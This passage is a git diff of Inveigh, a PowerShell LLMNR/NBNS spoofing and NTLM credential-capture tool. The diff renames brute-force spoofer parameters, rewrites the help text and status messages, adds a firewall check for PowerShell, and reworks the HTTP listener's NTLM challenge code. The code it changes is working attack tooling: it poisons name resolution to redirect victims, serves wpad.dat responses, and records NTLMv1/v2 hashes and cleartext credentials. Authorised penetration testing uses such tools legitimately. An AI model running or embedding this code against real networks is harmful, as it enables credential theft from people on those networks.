- Write-Output $inveigh.NTLMv2_username_list
- }
- else
- {
- Write-Output $inveigh.NTLMv2_list
- }
+if($Cleartext)
+{
+ Write-Output $inveigh.cleartext_list
+}
+if($CleartextUnique)
+{
+ Write-Output $inveigh.cleartext_list | Get-Unique
}
-function Get-InveighLog
+if($Learning)
{
- <#
- .SYNOPSIS
- Get-InveighLog will get log entries.
- #>
+ Write-Output $inveigh.valid_host_list
+}
- Write-Output $inveigh.log
}
function Watch-Inveigh
{
- <#
- .SYNOPSIS
- Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
- #>
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+#>
+
+if($inveigh.tool -ne 1)
+{
- if($inveigh.tool -ne 1)
+ if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
{
+ Write-Output "Press any key to stop real time console output"
+ $inveigh.console_output = $true
- if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+ :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
{
- Write-Output "Press any key to stop real time console output"
- $inveigh.console_output = $true
- :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ while($inveigh.console_queue.Count -gt 0)
{
- while($inveigh.console_queue.Count -gt 0)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ else
{
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
- else
+ switch -wildcard ($inveigh.console_queue[0])
{
-
- switch -wildcard ($inveigh.console_queue[0])
- {
- "Inveigh *exited *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
-
- "* written to *"
- {
-
- if($inveigh.file_output)
- {
- Write-Warning $inveigh.console_queue[0]
- }
-
- $inveigh.console_queue.RemoveAt(0)
- }
+ "* written to *"
+ {
- "* for relay *"
+ if($inveigh.file_output)
{
Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
}
- "*SMB relay *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ $inveigh.console_queue.RemoveAt(0)
+ }
- "* local administrator *"
- {
- Write-Warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ "* for relay *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
- default
- {
- Write-Output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveAt(0)
- }
+ "*SMB relay *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ "* local administrator *"
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
}
}
-
- }
- if([Console]::KeyAvailable)
- {
- $inveigh.console_output = $false
- BREAK console_loop
}
+
+ }
- Start-Sleep -m 5
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
}
- }
- else
- {
- Write-Output "Inveigh isn't running"
+ Start-Sleep -m 5
}
}
else
{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+ Write-Output "Inveigh isn't running"
}
}
+else
+{
+ Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
function Clear-Inveigh
{
- <#
- .SYNOPSIS
- Clear-Inveigh will clear Inveigh data from memory.
- #>
-
- if($inveigh)
- {
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
- if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
- {
- Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
- }
- else
- {
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
- }
+if($inveigh)
+{
+ if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "Inveigh data has been cleared from memory"
}
+ else
+ {
+ Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+ }
+
+}
} \ No newline at end of file
diff --git a/Scripts/Inveigh-Unprivileged.ps1 b/Scripts/Inveigh-Unprivileged.ps1
index 9cb2538..ea278eb 100644
--- a/Scripts/Inveigh-Unprivileged.ps1
+++ b/Scripts/Inveigh-Unprivileged.ps1
@@ -20,16 +20,13 @@ Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with the f
Run time control
This function contains only features that do not require local admin access. Note that there are caveats. A local
-firewall can still prevent prevent traffic from reaching this function's listeners. Also, if LLMNR is enabled on
-the host, the LLMNR spoofer will not work. Both of these scenarios would still require local admin access to
+firewall can still prevent traffic from reaching this function's listeners. Also, if LLMNR is enabled on the host,
+the LLMNR spoofer will not work. Both of these scenarios would still require local admin access to
change.
.PARAMETER SpooferIP
-Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a
-system other than the Inveigh host.
-
-.PARAMETER SpooferTarget
-Specify an IP address to target for NBNS brute force spoofing.
+IP address for the LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+other than the Inveigh host.
.PARAMETER SpooferHostsReply
Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
@@ -48,52 +45,55 @@ Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim s
challenge/response has been captured.
.PARAMETER LLMNR
-Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing.
+Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
.PARAMETER LLMNRTTL
-Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet.
+Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
.PARAMETER NBNS
-Default = Disabled: (Y/N) Enable/Disable NBNS spoofing.
+Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
.PARAMETER NBNSTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
+Default = 165 Seconds: NBNS TTL in seconds for the response packet.
.PARAMETER NBNSBruteForce
-Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofing.
+Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+
+.PARAMETER NBNSBruteForceHost
+Default = WPAD: Hostname for the NBNS Brute Force spoofer.
.PARAMETER NBNSBruteForcePause
-Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after
-an incoming HTTP request is received.
+Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming
+HTTP request is received.
+
+.PARAMETER NBNSBruteForceTarget
+IP address to target for NBNS brute force spoofing.
.PARAMETER HTTP
Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPIP
-Default = Any: Specify a TCP IP address for the HTTP listener.
+Default = Any: IP address for the HTTP listener.
.PARAMETER HTTPPort
-Default = 80: Specify a TCP port for the HTTP listener.
+Default = 80: TCP port for the HTTP listener.
.PARAMETER HTTPAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not
-apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016
-patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random
-hostnames and connecting to the root of the web server.
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to
+wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A
+WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and
+connecting to the root of the HTTP listener.
.PARAMETER HTTPBasicRealm
-Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
.PARAMETER HTTPResponse
-Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat
-requests. Use PowerShell character escapes where necessary.
+String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+Use PowerShell character escapes where necessary.
.PARAMETER WPADAuth
-Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests.
-Setting to Anonymous can prevent browser login prompts.
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
.PARAMETER WPADEmptyFile
Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
@@ -101,24 +101,24 @@ Enabling this setting can reduce the amount of redundant wpad.dat requests. This
using WPADIP, WPADPort, or WPADResponse.
.PARAMETER WPADIP
-Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
-must be used with WPADPort.
+Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
+with WPADPort.
.PARAMETER WPADPort
-Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter
-must be used with WPADIP.
+Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
+used with WPADIP.
.PARAMETER WPADDirectHosts
Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
defined proxy. Use PowerShell character escapes where necessary.
.PARAMETER WPADResponse
-Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and
-WPADPort are set.
+wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort
+are set.
.PARAMETER Challenge
-Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a
-random challenge will be generated for each request. This will only be used for non-relay captures.
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. This will only be used for non-relay captures.
.PARAMETER MachineAccounts
Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
@@ -128,7 +128,7 @@ Default = Disabled: (Y/N) Enable/Disable real time console output. If using this
ensure that it doesn't hang the shell.
.PARAMETER ConsoleStatus
-(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
displaying full capture lists when running through a shell that does not have access to the support functions.
.PARAMETER ConsoleUnique
@@ -151,14 +151,14 @@ running Inveigh Unprivileged through a shell that does not return other output s
the various yellow warning messages if enabled.
.PARAMETER OutputDir
-Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must
-also be enabled.
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
.PARAMETER RunTime
-Default = Unlimited: (Integer) Set the run time duration in minutes.
+Default = Unlimited: (Integer) Run time duration in minutes.
.PARAMETER RunCount
-Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting.
+Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -187,46 +187,47 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile="Y",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM",
- [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes=@("00","20"),
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP="",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="",
- [parameter(Mandatory=$false)][Array]$SpooferHostsReply="",
- [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore="",
- [parameter(Mandatory=$false)][Array]$SpooferIPsReply="",
- [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore="",
- [parameter(Mandatory=$false)][Array]$WPADDirectHosts="",
- [parameter(Mandatory=$false)][Int]$ConsoleStatus="",
- [parameter(Mandatory=$false)][Int]$HTTPPort="80",
- [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause="",
- [parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
- [parameter(Mandatory=$false)][Int]$NBNSTTL="165",
- [parameter(Mandatory=$false)][Int]$WPADPort="",
- [parameter(Mandatory=$false)][Int]$RunCount="",
- [parameter(Mandatory=$false)][Int]$RunTime="",
- [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS",
- [parameter(Mandatory=$false)][String]$HTTPResponse="",
- [parameter(Mandatory=$false)][String]$WPADResponse="",
- [parameter(Mandatory=$false)][String]$Hostname = "WPAD",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
+ [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
+ [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
+ [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
+ [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+ [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "",
+ [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
+ [parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
+ [parameter(Mandatory=$false)][Int]$WPADPort = "",
+ [parameter(Mandatory=$false)][Int]$RunCount = "",
+ [parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
+ [parameter(Mandatory=$false)][String]$HTTPResponse = "",
+ [parameter(Mandatory=$false)][String]$WPADResponse = "",
+ [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD",
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
@@ -240,9 +241,9 @@ if($NBNS -eq 'Y' -or $LLMNR -eq 'Y' -and $NBNSBruteForce -eq 'Y')
throw "You cannot use NBNSBruteForce with NBNS or LLMNR enabled"
}
-if($NBNSBruteForce -eq 'Y' -and !$SpooferTarget)
+if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
{
- throw "You must specify a -SpooferTarget if enabling -NBNSBruteForce"
+ throw "You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
}
if(!$SpooferIP)
@@ -311,12 +312,6 @@ if(!$inveigh.running -or !$inveigh.relay_running)
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
- $inveigh.HTTP_response = $HTTPResponse
- $inveigh.HTTP_directory = $HTTPDir
- $inveigh.HTTP_default_file = $HTTPDefaultFile
- $inveigh.HTTP_default_exe = $HTTPDefaultEXE
- $inveigh.WPAD_response = $WPADResponse
- $inveigh.challenge = $Challenge
}
$inveigh.hostname_spoof = $false
@@ -371,28 +366,37 @@ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -
if($firewall_status)
{
$inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
+
+ $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
+ $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
+
+ if($firewall_powershell)
+ {
+ $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
+ }
+
}
if($LLMNR -eq 'Y')
{
- $LLMNR_port_check = netstat -ap UDP | findstr 0.0.0.0:5355
+ $LLMNR_port_check = netstat -anp UDP | findstr 0.0.0.0:5355
if(!$LLMNR_port_check)
{
- $inveigh.status_queue.Add("LLMNR Spoofing = Enabled") > $null
+ $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
$inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
- $LLMNR_response_message = "- spoofed response has been sent"
+ $LLMNR_response_message = "- response sent"
}
else
{
$LLMNR = "N"
- $inveigh.status_queue.Add("LLMNR Spoofing Disabled Due To In Use Port 5355") > $null
+ $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
}
}
else
{
- $inveigh.status_queue.Add("LLMNR Spoofing = Disabled") > $null
- $LLMNR_response_message = "- LLMNR spoofing is disabled"
+ $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null
+ $LLMNR_response_message = "- LLMNR spoofer is disabled"
}
if($NBNS -eq 'Y')
@@ -401,40 +405,61 @@ if($NBNS -eq 'Y')
if($NBNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output = Enabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output = Enabled") > $null
+ $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
}
- $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
- $NBNS_response_message = "- spoofed response has been sent"
+ $NBNS_response_message = "- response sent"
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofing = Disabled") > $null
- $NBNS_response_message = "- NBNS spoofing is disabled"
+ $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null
+ $NBNS_response_message = "- NBNS spoofer is disabled"
+}
+
+if($NBNSBruteForce -eq 'Y')
+{
+ $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
+ $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
+ $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
+
+ if($NBNSBruteForcePause)
+ {
+ $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
+ }
+
+}
+else
+{
+ $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null
+}
+
+if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y')
+{
+ $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
}
if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
}
if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Ignoring requests for " + $SpooferHostsIgnore -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
}
if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofing requests from " + $SpooferIPsReply -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer Ips Reply = " + ($SpooferIPsReply -join ",")) > $null
}
if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Ignoring requests from " + $SpooferIPsIgnore -join ",") > $null
+ $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
}
if($SpooferRepeat -eq 'N')
@@ -447,28 +472,10 @@ else
$inveigh.spoofer_repeat = $true
}
-if($NBNSBruteForce -eq 'Y')
-{
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $SpooferTarget") > $null
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $Hostname") > $null
-
- if($NBNSBruteForcePause)
- {
- $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
- }
-
- $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
-}
-else
-{
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null
-}
-
if($HTTP -eq 'Y')
{
- $HTTP_port_check = netstat -ap TCP | findstr 0.0.0.0:$HTTPPort
+ $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:$HTTPPort
if($HTTP_port_check)
{
@@ -618,7 +625,6 @@ if($RunCount)
if($ShowHelp -eq 'Y')
{
- $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null
$inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Unprivileged") > $null
if($inveigh.console_output)
@@ -642,7 +648,7 @@ if($inveigh.status_output)
else
{
- switch ($inveigh.status_queue[0])
+ switch -Wildcard ($inveigh.status_queue[0])
{
"* Disabled Due To *"
@@ -715,20 +721,21 @@ $shared_basic_functions_scriptblock =
# HTTP Server ScriptBlock - HTTP listener
$HTTP_scriptblock =
{
- param ($HTTPAuth,$HTTPBasicRealm,$HTTPIP,$HTTPPort,$HTTPResponse,$NBNSBruteForcePause,$WPADAuth,$WPADEmptyFile,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPIP,$HTTPPort,$HTTPResponse,$NBNSBruteForcePause,$WPADAuth,$WPADEmptyFile,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount)
function NTLMChallengeBase64
{
+ param ([String]$Challenge)
$HTTP_timestamp = Get-Date
$HTTP_timestamp = $HTTP_timestamp.ToFileTime()
$HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
$HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- if($inveigh.challenge)
+ if($Challenge)
{
- $HTTP_challenge = $inveigh.challenge
- $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge = $Challenge
+ $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
$HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
}
else
@@ -881,12 +888,12 @@ $HTTP_scriptblock =
$HTTP_type = "HTTP"
$NTLM = "NTLM"
$NTLM_auth = $false
- $source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
+ $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
{
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $source_IP")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $source_IP")])
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
}
if($authentication_header.startswith('NTLM '))
@@ -898,7 +905,7 @@ $HTTP_scriptblock =
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
$HTTP_response_status_code = 0x34,0x30,0x31
- $NTLM = NTLMChallengeBase64
+ $NTLM = NTLMChallengeBase64 $Challenge
$HTTP_client_close = $false
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
@@ -908,7 +915,7 @@ $HTTP_scriptblock =
$HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
$HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
- [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
+ [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
$HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
@@ -936,27 +943,27 @@ $HTTP_scriptblock =
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $source_IP ($HTTP_NTLM_host_string)")])
